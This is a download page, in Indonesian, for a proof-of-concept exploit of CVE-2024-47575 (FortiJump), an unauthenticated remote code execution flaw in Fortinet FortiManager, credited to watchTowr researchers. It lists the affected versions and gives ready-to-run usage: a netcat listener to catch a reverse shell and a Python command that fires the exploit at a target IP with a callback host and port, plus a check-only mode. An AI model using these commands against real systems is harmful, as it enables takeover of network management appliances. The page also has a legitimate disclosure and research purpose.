Beranda>Terkait pemrograman>Kode sumber lainnya
Unduh

CVE-2024-47575

Fortinet FortiManager Eksekusi Kode Jarak Jauh Tidak Diautentikasi AKA FortiJump CVE-2024-47575

Lihat posting blog kami untuk detail teknis

Untuk memulai, buat sesi ncat Anda: 

 nc -lvvnp 80

Kemudian, jalankan generator artefak deteksi kami: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

Untuk memeriksa kerentanan saja, gunakan opsi berikut: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --action check

Versi yang Terkena Dampak 

 FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

Eksploitasi penulis

Eksploitasi ini ditulis oleh Sina Kheirkhah (@SinSinology) dari watchTowr (@watchtowrcyber)

Ikuti watchTowr Labs

Untuk penelitian keamanan terbaru, ikuti Tim watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Memperluas
Informasi Tambahan
Aplikasi Terkait
Direkomendasikan untuk Anda
Informasi Terkait Semua